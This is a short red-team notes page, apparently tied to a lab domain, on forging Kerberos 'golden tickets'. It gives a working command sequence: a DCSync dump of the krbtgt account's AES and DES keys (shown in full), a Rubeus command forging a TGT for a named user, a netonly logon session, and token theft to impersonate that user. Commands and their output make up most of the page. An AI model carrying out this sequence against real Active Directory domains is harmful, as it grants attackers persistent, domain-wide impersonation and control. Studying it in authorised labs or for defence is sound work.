Golden Tickets

A "golden ticket" is a forged TGT, signed by the domain's krbtgt account. The krbtgt NTLM/AES hash is probably the single most powerful secret you can obtain (and is why you see it used in dcsync examples so frequently).

Obtain KRBTGT secrets

(from DC)

dcsync dev.cyberbotic.io DEV\krbtgt

Primary:Kerberos-Newer-Keys 
  Default Salt : DEV.CYBERBOTIC.IOkrbtgt
  Default Iterations : 4096
  Credentials
    aes256_hmac       (4096) : 51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e
    aes128_hmac       (4096) : 6fb62ed56c7de778ca5e4fe6da6d3aca
    des_cbc_md5       (4096) : 629189372a372fda

Rubeus.exe golden /aes256:51d7f328ade26e9f785fd7eee191265ebc87c01a4790a7f38fb52e06563d4e7e /user:nlamb /domain:dev.cyberbotic.io /sid:S-1-5-21-569305411-121244042-2357301523 /nowrap

Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe /domain:DEV /username:nlamb /password:FakePass /ticket:doIFLz[...snip...]MuaW8=

[+] ProcessID       : 5060

steal_token 5060

Last updated 2 years ago